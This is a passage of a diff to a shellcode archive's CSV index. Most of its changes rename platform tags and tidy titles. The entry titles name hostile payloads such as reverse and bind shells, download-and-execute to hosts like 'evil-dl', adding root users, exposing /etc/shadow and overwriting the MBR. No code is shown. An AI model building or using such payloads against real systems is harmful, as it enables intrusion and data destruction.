-13463,shellcodes/lin_x86-64/13463.c,"Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,lin_x86-64 -13464,shellcodes/lin_x86-64/13464.s,"Linux/x86-64 - execve /bin/sh Shellcode (33 bytes)",2006-11-02,hophet,shellcode,lin_x86-64 +13402,shellcodes/linux_x86/13402.c,"Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)",2005-12-28,xort,shellcode,linux_x86 +13403,shellcodes/linux_x86/13403.c,"Linux/x86 - dup2(0_0) + dup2(0_1) + dup2(0_2) Shellcode (15 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86 +13404,shellcodes/linux_x86/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf() Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86 +13405,shellcodes/linux_x86/13405.c,"Linux/x86 - _exit(1) Shellcode (7 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86 +13406,shellcodes/linux_x86/13406.c,"Linux/x86 - read(0_buf_2541) + chmod(buf_4755) Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86 +13407,shellcodes/linux_x86/13407.c,"Linux/x86 - write(0__Hello core!\n__12) + Exit Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86 +13408,shellcodes/linux_x86/13408.c,"Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,shellcode,linux_x86 +13409,shellcodes/linux_x86/13409.c,"Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,shellcode,linux_x86 +13410,shellcodes/linux_x86/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2)",2005-09-09,xort,shellcode,linux_x86 +13411,shellcodes/linux_x86/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)",2005-09-08,xort,shellcode,linux_x86 +13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,linux_x86 +13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,linux_x86 +13414,shellcodes/linux_x86/13414.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,linux_x86 +13415,shellcodes/linux_x86/13415.c,"Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes)",2005-07-11,Okti,shellcode,linux_x86 +13416,shellcodes/linux_x86/13416.txt,"Linux/x86 - upload + exec Shellcode (189 bytes)",2005-06-19,cybertronic,shellcode,linux_x86 +13417,shellcodes/linux_x86/13417.c,"Linux/x86 - setreuid + execve Shellcode (31 bytes)",2004-12-26,oc192,shellcode,linux_x86 +13418,shellcodes/linux_x86/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,shellcode,linux_x86 +13419,shellcodes/linux_x86/13419.c,"Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,shellcode,linux_x86 +13420,shellcodes/linux_x86/13420.c,"Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)",2004-12-22,xort,shellcode,linux_x86 +13421,shellcodes/linux_x86/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,shellcode,linux_x86 +13422,shellcodes/linux_x86/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,linux_x86 +13423,shellcodes/linux_x86/13423.c,"Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes)",2004-11-15,zasta,shellcode,linux_x86 +13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86 +13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86 +13426,shellcodes/linux_x86/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,linux_x86 +13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86 +13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 +13429,shellcodes/linux_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 +13430,shellcodes/linux_x86/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,linux_x86 +13431,shellcodes/linux_x86/13431.c,"Linux/x86 - Kill Snort Shellcode (151 bytes)",2004-09-26,nob0dy,shellcode,linux_x86 +13432,shellcodes/linux_x86/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,shellcode,linux_x86 +13433,shellcodes/linux_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,linux_x86 +13434,shellcodes/linux_x86/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,shellcode,linux_x86 +13435,shellcodes/linux_x86/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,shellcode,linux_x86 +13436,shellcodes/linux_x86/13436.c,"Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)",2004-09-26,lamagra,shellcode,linux_x86 +13437,shellcodes/linux_x86/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 +13438,shellcodes/linux_x86/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,shellcode,linux_x86 +13439,shellcodes/linux_x86/13439.c,"Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes)",2004-09-26,lamagra,shellcode,linux_x86 +13440,shellcodes/linux_x86/13440.c,"Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes)",2004-09-26,RaiSe,shellcode,linux_x86 +13441,shellcodes/linux_x86/13441.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)",2004-09-26,Sp4rK,shellcode,linux_x86 +13442,shellcodes/linux_x86/13442.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 +13443,shellcodes/linux_x86/13443.c,"Linux/x86 - execve /bin/sh Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13444,shellcodes/linux_x86/13444.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13445,shellcodes/linux_x86/13445.c,"Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13446,shellcodes/linux_x86/13446.c,"Linux/x86 - execve /bin/sh Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13447,shellcodes/linux_x86/13447.c,"Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,shellcode,linux_x86 +13448,shellcodes/linux_x86/13448.c,"Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13449,shellcodes/linux_x86/13449.c,"Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13450,shellcodes/linux_x86/13450.c,"Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13451,shellcodes/linux_x86/13451.c,"Linux/x86 - Add Root User Shellcode (104 bytes)",2004-09-12,"Matt Conover",shellcode,linux_x86 +13452,shellcodes/linux_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)",2004-09-12,dev0id,shellcode,linux_x86 +13453,shellcodes/linux_x86/13453.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes)",2004-09-12,dev0id,shellcode,linux_x86 +13454,shellcodes/linux_x86/13454.c,"Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,shellcode,linux_x86 +13455,shellcodes/linux_x86/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86 +13456,shellcodes/linux_x86/13456.c,"Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,linux_x86 +13457,shellcodes/linux_x86/13457.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,linux_x86 +13458,shellcodes/linux_x86/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",shellcode,linux_x86 +13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86 +13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86 +13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86 +13463,shellcodes/linux_x86-64/13463.c,"Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64 +13464,shellcodes/linux_x86-64/13464.s,"Linux/x86-64 - execve /bin/sh Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64 13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",shellcode,multiple 13466,shellcodes/multiple/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,shellcode,multiple 13467,shellcodes/multiple/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)",2004-09-12,dymitri,shellcode,multiple @@ -226,8 +226,8 @@ id,file,description,date,author,type,platform 13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,shellcode,multiple 13470,shellcodes/netbsd_x86/13470.c,"NetBSD/x86 - Kill All Processes Shellcode (23 bytes)",2009-06-18,anonymous,shellcode,netbsd_x86 13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP Shell (6666/TCP) Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 -13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 -13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 +13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 +13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86 13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2006-05-01,hophet,shellcode,openbsd_x86 13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86 @@ -242,7 +242,7 @@ id,file,description,date,author,type,platform 13485,shellcodes/osx_ppc/13485.c,"OSX/PPC - Create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc 13486,shellcodes/osx_ppc/13486.c,"OSX/PPC - Simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc 13487,shellcodes/osx_ppc/13487.c,"OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc -13488,shellcodes/sco_x86/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes)",2005-11-30,"p. minervini",shellcode,sco_x86 +13488,shellcodes/sco_x86/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes)",2005-11-30,"p. minervini",shellcode,sco_x86 13489,shellcodes/solaris_sparc/13489.c,"Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_sparc 13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc 13491,shellcodes/generator/13491.c,"Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator @@ -253,381 +253,381 @@ id,file,description,date,author,type,platform 13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc 13497,shellcodes/solaris_sparc/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc 13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator -13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh); + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86 +13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh) + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86 13500,shellcodes/solaris_x86/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,shellcode,solaris_x86 13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 13503,shellcodes/unixware/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware -13504,shellcodes/win_x86/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode",2009-07-27,Skylined,shellcode,win_x86 -13505,shellcodes/win_x86/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,win_x86 -13507,shellcodes/win_x86/13507.txt,"Windows x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,win_x86 -13508,shellcodes/win_x86/13508.asm,"Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,shellcode,win_x86 -13509,shellcodes/win_x86/13509.c,"Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,shellcode,win_x86 -13510,shellcodes/win_x86/13510.c,"Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,shellcode,win_x86 -13511,shellcodes/win_x86/13511.c,"Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,win_x86 -13512,shellcodes/win_x86/13512.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,win_x86 -13513,shellcodes/win_x86/13513.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,win_x86 -13514,shellcodes/win_x86/13514.asm,"Windows x86 - ConnectBack + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,win_x86 +13504,shellcodes/windows_x86/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86 +13505,shellcodes/windows_x86/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86 +13507,shellcodes/windows_x86/13507.txt,"Windows x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86 +13508,shellcodes/windows_x86/13508.asm,"Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,shellcode,windows_x86 +13509,shellcodes/windows_x86/13509.c,"Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,shellcode,windows_x86 +13510,shellcodes/windows_x86/13510.c,"Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,shellcode,windows_x86 +13511,shellcodes/windows_x86/13511.c,"Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,windows_x86 +13512,shellcodes/windows_x86/13512.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86 +13513,shellcodes/windows_x86/13513.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,windows_x86 +13514,shellcodes/windows_x86/13514.asm,"Windows x86 - Reverse Connection + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86 13515,shellcodes/generator/13515.pl,"Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator -13516,shellcodes/win_x86/13516.asm,"Windows x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,win_x86 -13517,shellcodes/win_x86/13517.asm,"Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,win_x86 -13518,shellcodes/win_x86/13518.c,"Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,shellcode,win_x86 -13519,shellcodes/win_x86/13519.c,"Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)",2006-04-14,xnull,shellcode,win_x86 -13520,shellcodes/win_x86/13520.c,"Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)",2006-01-24,Omega7,shellcode,win_x86 -13521,shellcodes/win_x86/13521.asm,"Windows x86 - Command WinExec() Shellcode (104+ bytes)",2006-01-24,Weiss,shellcode,win_x86 -13522,shellcodes/win_x86/13522.c,"Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)",2005-12-23,darkeagle,shellcode,win_x86 -13523,shellcodes/win_x86/13523.c,"Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)",2005-10-28,darkeagle,shellcode,win_x86 -13524,shellcodes/win_x86/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",shellcode,win_x86 -13525,shellcodes/win_x86/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,shellcode,win_x86 -13526,shellcodes/win_x86/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,win_x86 -13527,shellcodes/win_x86/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,win_x86 +13516,shellcodes/windows_x86/13516.asm,"Windows x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,windows_x86 +13517,shellcodes/windows_x86/13517.asm,"Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,windows_x86 +13518,shellcodes/windows_x86/13518.c,"Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,shellcode,windows_x86 +13519,shellcodes/windows_x86/13519.c,"Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)",2006-04-14,xnull,shellcode,windows_x86 +13520,shellcodes/windows_x86/13520.c,"Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)",2006-01-24,Omega7,shellcode,windows_x86 +13521,shellcodes/windows_x86/13521.asm,"Windows x86 - Command WinExec() Shellcode (104+ bytes)",2006-01-24,Weiss,shellcode,windows_x86 +13522,shellcodes/windows_x86/13522.c,"Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)",2005-12-23,darkeagle,shellcode,windows_x86 +13523,shellcodes/windows_x86/13523.c,"Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)",2005-10-28,darkeagle,shellcode,windows_x86 +13524,shellcodes/windows_x86/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",shellcode,windows_x86 +13525,shellcodes/windows_x86/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,shellcode,windows_x86 +13526,shellcodes/windows_x86/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,windows_x86 +13527,shellcodes/windows_x86/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,windows_x86 13528,shellcodes/generator/13528.c,"Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53/TCP) Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator -13529,shellcodes/win_x86/13529.c,"Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,shellcode,win_x86 -13530,shellcodes/win_x86/13530.asm,"Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,win_x86 -13531,shellcodes/win_x86/13531.c,"Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)",2004-09-26,silicon,shellcode,win_x86 -13532,shellcodes/win_x86/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,shellcode,win_x86 -13533,shellcodes/win_x86-64/13533.asm,"Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,win_x86-64 -13548,shellcodes/lin_x86/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,shellcode,lin_x86 -13549,shellcodes/lin_x86/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,lin_x86 -13550,shellcodes/lin_x86/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,shellcode,lin_x86 -13551,shellcodes/lin_x86/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,shellcode,lin_x86 -13553,shellcodes/lin_x86/13553.c,"Linux/x86 - execve Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,lin_x86 +13529,shellcodes/windows_x86/13529.c,"Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,shellcode,windows_x86 +13530,shellcodes/windows_x86/13530.asm,"Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,windows_x86 +13531,shellcodes/windows_x86/13531.c,"Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86 +13532,shellcodes/windows_x86/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,shellcode,windows_x86 +13533,shellcodes/windows_x86-64/13533.asm,"Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64 +13548,shellcodes/linux_x86/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,shellcode,linux_x86 +13549,shellcodes/linux_x86/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,linux_x86 +13550,shellcodes/linux_x86/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,shellcode,linux_x86 +13551,shellcodes/linux_x86/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,shellcode,linux_x86 +13553,shellcodes/linux_x86/13553.c,"Linux/x86 - execve Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,linux_x86 13560,shellcodes/windows/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows -13563,shellcodes/lin_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,lin_x86 -13565,shellcodes/win_x86/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,win_x86 -13566,shellcodes/lin_x86/13566.c,"Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,lin_x86 -13569,shellcodes/win_x86/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode",2009-12-24,sinn3r,shellcode,win_x86 +13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,linux_x86 +13565,shellcodes/windows_x86/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,windows_x86 +13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,linux_x86 +13569,shellcodes/windows_x86/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode",2009-12-24,sinn3r,shellcode,windows_x86 13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP /bin/sh Shell (1337/TCP) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86 -13571,shellcodes/win_x86/13571.c,"Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,win_x86 -13572,shellcodes/lin_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,sandman,shellcode,lin_x86 -13574,shellcodes/win_x86/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,win_x86 -13576,shellcodes/lin_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,lin_x86 -13577,shellcodes/lin_x86/13577.txt,"Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,lin_x86 